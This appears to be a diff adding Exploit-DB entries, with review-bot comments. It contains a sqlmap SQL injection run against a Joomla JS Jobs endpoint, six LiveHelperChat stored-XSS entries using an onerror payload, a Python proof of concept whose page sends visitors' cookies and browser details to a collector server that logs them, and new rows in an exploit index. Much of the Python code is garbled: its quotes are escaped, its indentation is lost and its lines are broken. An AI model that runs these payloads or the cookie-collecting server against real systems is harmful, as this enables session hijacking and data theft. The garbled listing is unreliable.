To exploit this vulnerability login as the jobseeker user with default credentials (jobseeker:demo) and go to 'jobseeker-controlpanel >> My Stuff >> Newest Jobs >> Newest Jobs >> Apply Now >> Apply Now' and capture the "Apply Now" request (req.txt).
HTTP Request:
```
POST /index.php?option=com_jsjobs&task=jobapply.jobapplyajax HTTP/2
Host: localhost:8080
Cookie: joomla_user_state=logged_in; 67aa5f9b49e233456b916ea62ef1447b=kjou43pssdvaa5plr84dhc8P64
Content-Length: 38
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/index.php/component/jsjobs/newest-jobs?Itemid=
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
jobid=1&cvid=1&coverletterid=4&uid=460
```
Exploit:
```
sqlmap -r req.txt --dbs --batch -p cvid --dbms=mysql --threads=10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.1.2#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
---
Parameter: cvid (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: jobid=1&cvid=(SELECT (CASE WHEN (7270=7270) THEN 1 ELSE (SELECT 6098 UNION SELECT 7386) END))&coverletterid=4&uid=460
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: jobid=1&cvid=1 AND (SELECT 6497 FROM (SELECT(SLEEP(5)))EAyv)&coverletterid=4&uid=460
---
available databases [2]:
[*] joomla_db
[*] information_schema
```
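Review bot: The write-up ends at the sqlmap output and names neither a fixed release nor a mitigation, which is what a site owner reading this entry needs. Since both the boolean-based and the time-based payload are accepted in `cvid`, the value is evidently reaching the query unsanitised, and the note could say that numeric identifiers such as `cvid` have to be integer-cast or bound as parameters. It should also state whether `jobseeker:demo` is a vendor demo account or one created by a default install, because the injection needs only that login. The `Version:` and `Tested on:` lines both read `v1.4.2` and leave open whether earlier releases are affected.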


@ -0,0 +1,32 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
via Telegram Bot Username
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51396
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51396
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Telegram Bot Username parameter. This
payload is stored and later executed when an admin or higher-privileged
user views or edits the Telegram Bot Username.
## Reproduction Steps:
1. Log in as an operator user in Live Helper Chat.
2. Navigate to `Settings > Live Help Configuration > Telegram Bot`.
3. In the **Bot Username** field, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the settings.
5. Revisit the Telegram configuration panel and — the payload will execute.
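Review bot: The header lists `# Version: <=4.61` and `# Patched Version: 4.61`, so the same release is given as both affected and fixed; the Operator Surname and Facebook Integration Page Name entries further down carry the identical pair of lines. One of the two values has to be corrected, otherwise a reader cannot tell whether upgrading to 4.61 is sufficient. The reproduction steps also stop at the `prompt(1)` popup without naming the fix class: the stored Bot Username is evidently written into an HTML attribute unescaped, given the `">` prefix of the payload, and a line saying that the field must be HTML-encoded on output would make the entry useful for remediation.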


@ -0,0 +1,33 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51397
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51397
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Operator Surname field. This payload
is stored and later executed when an admin or higher-privileged user views
the Recipients List where the attacker is listed as the Owner.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Operator Surname field.
3. Create new Operator Surname or Modify the Operator Surname, enter the
following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. This payload is stored and later executed when an admin or
higher-privileged user views the Recipients List where the attacker is
listed as the Owner.


@ -0,0 +1,35 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
via Facebook Integration Page Name Field
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51398
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51398
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Facebook page integration Name Field.
The payload is stored and executed when higher-privileged users (e.g.,
administrators) access or edit the integration settings, resulting in
stored Cross Site Scripting (XSS).
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Facebook page integration.
3. Create new Facebook page integration, enter the following payload in the
Facebook page integration Name Field:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. The payload is stored and executed when higher-privileged users (e.g.,
operator or administrators) access or edit the Facebook page integration,
resulting in stored Cross Site Scripting (XSS).


@ -0,0 +1,32 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS)
via Personal Canned Messages
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51400
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51400
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Personal Canned Messages. When an
admin or operator user views the message, and tries to send canned messages
the stored javascript executes in their browser context.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Personal Canned Messages.
3. Create new personal canned message, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. Try to use the personal canned message, the cross site scripting (xss)
will execute.


@ -0,0 +1,30 @@
# Exploit Title: LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51401
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51401
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat
version ≤ 4.61 allows attackers to execute arbitrary JavaScript by
injecting a crafted payload into the Operator Chat Name Field Triggers on
Chat Owner Transfer Functionality on Live Helper Chat.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your operator settings page.
3. In the **Name** field, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. Initiate a chat with a visitor.
6. Transfer the chat to another operator — the XSS payload executes in the
receiving operators chat interface.


@ -0,0 +1,34 @@
# Exploit Title: LiveHelperChat <=4.61 - Stored Cross Site Scripting (XSS)
via Department Assignment Alias Nick Field
# Date: 09/06/2025
# Exploit Author: Manojkumar J (TheWhiteEvil)
# Linkedin: https://www.linkedin.com/in/manojkumar-j-7ba35b202/
# Vendor Homepage: https://github.com/LiveHelperChat/livehelperchat/
# Software Link:
https://github.com/LiveHelperChat/livehelperchat/
# Version: <=4.61
# Patched Version: 4.61
# Category: Web Application
# Tested on: Mac OS Sequoia 15.5, Firefox
# CVE : CVE-2025-51403
# Exploit link: https://github.com/Thewhiteevil/CVE-2025-51403
# Reference:
https://github.com/LiveHelperChat/livehelperchat/pull/2228/commits/2056503ad96e04467ec9af8d827109b9b9b46223
A low-privileged user/operator injects a malicious JavaScript payload into
the Department Assignment "Alias Nick" field while assigning or editing
department access. When a higher-privileged user (e.g., admin or operator)
edits the department assignment "Alias Nick" field, the stored script is
executed in their browser context.
## Reproduction Steps:
1. Log in as an operator.
2. Navigate to your Department Assignment settings page.
3. In the "Alias Nick" field, enter the following payload:
```
"><img src="x" onerror="prompt(1);">
```
4. Save the changes.
5. Revist the Department Assignment settings page and edit the Alias Nick
field, the cross site scripting (xss) will execute.


@ -0,0 +1,235 @@
# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176
#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
PORT = 8080
COLLECTOR_PORT = 9000
# HTML page with extended XSS exploit that sends lots of info via Image GET
to collector
HTML_CONTENT = b\\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
try {
var attackerServer = \\\"http://{LOCAL_IP}:{COLLECTOR_PORT}/collect\\\";
var cookies = document.cookie || \\\"\\\";
var url = window.location.href;
var referrer = document.referrer;
var language = navigator.language || \\\"\\\";
var platform = navigator.platform || \\\"\\\";
var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone ||
\\\"\\\";
var screenRes = screen.width + \\\"x\\\" + screen.height;
var data = {
cookie: cookies,
url: url,
referrer: referrer,
language: language,
platform: platform,
timezone: timezone,
screen: screenRes
};
var query = Object.keys(data).map(function(k) {
return encodeURIComponent(k) + \\\"=\\\" +
encodeURIComponent(data[k]);
}).join(\\\"&\\\");
var img = new Image();
img.src = attackerServer + \\\"?\\\" + query;
} catch(e) {
console.error(\\\"Error sending data:\\\", e);
}
};
</script>
</head>
<body>
<h1 style=\\\"color:red;\\\">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
\\\"\\\"\\\"
# Collector page with large sea picture and centered message (Unicode
allowed)
COLLECTOR_PAGE = \\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>Collected</title>
<style>
body {
margin: 0;
background: url(\\\'
https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80\\\')
no-repeat center center fixed;
background-size: cover;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
color: white;
font-family: Arial, sans-serif;
font-size: 2em;
text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
}
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
\\\"\\\"\\\"
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path in (\\\'/\\\', \\\'/index.html\\\'):
content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\",
local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\",
str(COLLECTOR_PORT).encode())
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
class CollectorHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
parsed_path = parse.urlparse(self.path)
if parsed_path.path == \\\"/collect\\\":
query = parse.parse_qs(parsed_path.query)
cookie = query.get(\\\"cookie\\\", [\\\"\\\"])[0]
url = query.get(\\\"url\\\", [\\\"\\\"])[0]
referrer = query.get(\\\"referrer\\\", [\\\"\\\"])[0]
language = query.get(\\\"language\\\", [\\\"\\\"])[0]
platform = query.get(\\\"platform\\\", [\\\"\\\"])[0]
timezone = query.get(\\\"timezone\\\", [\\\"\\\"])[0]
screen = query.get(\\\"screen\\\", [\\\"\\\"])[0]
ip = self.client_address[0]
user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\")
timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d
%H:%M:%S\\\")
location = self.get_location(ip)
if cookie:
print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\")
print(f\\\" URL: {url}\\\")
print(f\\\" Referrer: {referrer}\\\")
print(f\\\" Language: {language}\\\")
print(f\\\" Platform: {platform}\\\")
print(f\\\" Timezone: {timezone}\\\")
print(f\\\" Screen Resolution: {screen}\\\")
print(f\\\" From IP: {ip}\\\")
print(f\\\" User-Agent: {user_agent}\\\")
print(f\\\" Location: {location}\\\")
print(\\\"-\\\" * 50)
# Save collected info to a file
with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f:
f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\")
f.write(f\\\" URL: {url}\\\\n\\\")
f.write(f\\\" Referrer: {referrer}\\\\n\\\")
f.write(f\\\" Language: {language}\\\\n\\\")
f.write(f\\\" Platform: {platform}\\\\n\\\")
f.write(f\\\" Timezone: {timezone}\\\\n\\\")
f.write(f\\\" Screen Resolution: {screen}\\\\n\\\")
f.write(f\\\" IP: {ip}\\\\n\\\")
f.write(f\\\" User-Agent: {user_agent}\\\\n\\\")
f.write(f\\\" Location: {location}\\\\n\\\")
f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\")
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
content = COLLECTOR_PAGE.encode(\\\'utf-8\\\')
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
def get_location(self, ip):
# Use free IP info service; fallback gracefully if no internet
try:
resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3)
if resp.status_code == 200:
data = resp.json()
city = data.get(\\\"city\\\", \\\"\\\")
region = data.get(\\\"region\\\", \\\"\\\")
country = data.get(\\\"country\\\", \\\"\\\")
loc = data.get(\\\"loc\\\", \\\"\\\")
return f\\\"{city}, {region}, {country} (coords: {loc})\\\"
except Exception:
pass
return \\\"Location lookup failed or unavailable\\\"
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((\\\"8.8.8.8\\\", 80))
ip = s.getsockname()[0]
except Exception:
ip = \\\"127.0.0.1\\\"
finally:
s.close()
return ip
def run_exploit_server():
with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd:
print(f\\\"[*] Exploit server running at: http://
{local_ip}:{PORT}/index.html\\\")
httpd.serve_forever()
def run_collector_server():
with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as
httpd:
print(f\\\"[*] Collector server listening for stolen cookies at:
http://{local_ip}:{COLLECTOR_PORT}/collect\\\")
httpd.serve_forever()
if __name__ == \\\"__main__\\\":
local_ip = get_local_ip()
try:
print(f\\\"[*] Your server IP is: {local_ip}\\\")
exploit_thread = threading.Thread(target=run_exploit_server,
daemon=True)
exploit_thread.start()
run_collector_server()
except KeyboardInterrupt:
print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\")
```
# Video:
[href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
# Source:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
# Buy me a coffee if you are not ashamed:
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
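Review bot: The script in this entry is not valid Python as committed, so the claim in the title cannot be checked by running it: every quote is stored backslash-escaped (`b\\\"\\\"\\\"`, `\\\"/collect\\\"`), block indentation is missing, string literals and comments are wrapped mid-line (the `strftime` format, the `# HTML page …` comment), and the listing ends with a closing code fence that has no opening one. As far as the visible code shows, `ExploitHandler` serves a page whose own inline `window.onload` script runs from the test server's origin, so nothing here exercises a filter bypass in Edge, and `document.cookie` in that page would hold only cookies set for the test server. The entry should state which CVE-2015-6176 behaviour is being demonstrated and on which build it was observed. The page text also says "If this alert appears" although no alert is raised. For lab use I would note in the header that both listeners bind to every interface via `("", PORT)` and that `get_location` forwards each client IP to ipinfo.io, and I would make that lookup opt-in.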


@ -11618,6 +11618,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",remote,multiple,,2005-03-10,2013-05-13,1,,,,,,https://www.securityfocus.com/bid/12772/info 25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",remote,multiple,,2005-03-10,2013-05-13,1,,,,,,https://www.securityfocus.com/bid/12772/info
42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",remote,multiple,,2017-09-19,2017-09-20,0,CVE-2017-12930;CVE-2017-12929,,,,, 42753,exploits/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor Access",2017-05-19,"Simon Brannstrom",remote,multiple,,2017-09-19,2017-09-20,0,CVE-2017-12930;CVE-2017-12929,,,,,
51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",2022-09-23,"Brandon Roach",remote,multiple,,2022-09-23,2022-09-23,0,CVE-2022-36633,,,,, 51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",2022-09-23,"Brandon Roach",remote,multiple,,2022-09-23,2022-09-23,0,CVE-2022-36633,,,,,
52374,exploits/multiple/remote/52374.c,"Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow",2025-07-22,"Byte Reaper",remote,multiple,,2025-07-22,2025-07-22,0,CVE-2025-7795,,,,,
33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4491;OSVDB-61775,,,,,https://www.securityfocus.com/bid/37714/info 33499,exploits/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,remote,multiple,,2010-01-11,2014-05-26,1,CVE-2009-4491;OSVDB-61775,,,,,https://www.securityfocus.com/bid/37714/info
21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,remote,multiple,,2002-02-06,2012-09-12,1,CVE-2002-0266;OSVDB-4313,,,,,https://www.securityfocus.com/bid/4035/info 21276,exploits/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,remote,multiple,,2002-02-06,2012-09-12,1,CVE-2002-0266;OSVDB-4313,,,,,https://www.securityfocus.com/bid/4035/info
24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",remote,multiple,,2004-06-04,2013-01-19,1,,,,,,https://www.securityfocus.com/bid/10581/info 24224,exploits/multiple/remote/24224.c,"TildeSlash Monit 1-4 - Authentication Handling Buffer Overflow",2004-06-04,"Nilanjan De",remote,multiple,,2004-06-04,2013-01-19,1,,,,,,https://www.securityfocus.com/bid/10581/info
@ -11928,6 +11929,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,, 31686,exploits/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,webapps,multiple,80,2014-02-16,2014-02-16,1,OSVDB-103387,,,,,
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,, 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,,2018-07-11,2018-07-13,1,,Traversal,,http://www.exploit-db.com/screenshots/idlt45500/45007.png,,
33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info 33759,exploits/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,webapps,multiple,,2010-03-14,2014-06-15,1,,,,,,https://www.securityfocus.com/bid/38721/info
52375,exploits/multiple/webapps/52375.rb,"Discourse 3.1.1 - Unauthenticated Chat Message Access",2025-07-22,İbrahimsql,webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2023-45131,,,,,
52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,, 52358,exploits/multiple/webapps/52358.py,"Discourse 3.2.x - Anonymous Cache Poisoning",2025-07-08,İbrahimsql,webapps,multiple,,2025-07-08,2025-07-08,0,CVE-2024-47773,,,,,
49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,, 49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,,2021-04-08,2021-04-08,0,CVE-2021-30147,,,,,
48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,, 48681,exploits/multiple/webapps/48681.txt,"Docsify.js 4.11.4 - Reflective Cross-Site Scripting",2020-07-22,"Amin Sharifi",webapps,multiple,,2020-07-22,2020-07-22,0,CVE-2020-7680,,,,,
@ -12324,6 +12326,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,, 49736,exploits/multiple/webapps/49736.txt,"phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)",2021-04-01,"Valerio Severini",webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,, 49192,exploits/multiple/webapps/49192.txt,"Phpscript-sgh 0.1.0 - Time Based Blind SQL Injection",2020-12-04,KeopssGroup0day_Inc,webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,, 46935,exploits/multiple/webapps/46935.txt,"Phraseanet < 4.0.7 - Cross-Site Scripting",2019-05-28,"Krzysztof Szulski",webapps,multiple,,2019-05-28,2019-05-28,0,,,,,,
52370,exploits/multiple/webapps/52370.py,"Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2025-34077,,,,,
52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,, 52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,,
35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,, 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,,
52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,, 52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,,
@ -12402,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,, 51150,exploits/multiple/webapps/51150.txt,"Shoplazza 1.1 - Stored Cross-Site Scripting (XSS)",2023-03-30,"Andrey Stoykov",webapps,multiple,,2023-03-30,2023-03-30,0,,,,,,
48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,, 48712,exploits/multiple/webapps/48712.txt,"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)",2020-07-26,bdrake,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,, 52199,exploits/multiple/webapps/52199.txt,"SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)",2025-04-14,"James Nicoll",webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-47605,,,,,
52371,exploits/multiple/webapps/52371.py,"Simple File List WordPress Plugin 4.2.2 - File Upload to RCE",2025-07-22,"Md Amanat Ullah (xSwads)",webapps,multiple,,2025-07-22,2025-07-22,0,CVE-2020-36847,,,,,
50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,, 50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,,2021-06-30,2021-06-30,0,,,,,,
51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,, 51796,exploits/multiple/webapps/51796.txt,"SISQUALWFM 7.1.319.103 - Host Header Injection",2024-02-15,"Omer Shaik",webapps,multiple,,2024-02-15,2024-02-15,0,,,,,,
52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,, 52344,exploits/multiple/webapps/52344.py,"Sitecore 10.4 - Remote Code Execution (RCE)",2025-06-26,"Yesith Alvarez",webapps,multiple,,2025-06-26,2025-06-26,0,CVE-2025-27218,,,,,
@ -20949,6 +20953,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,, 51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
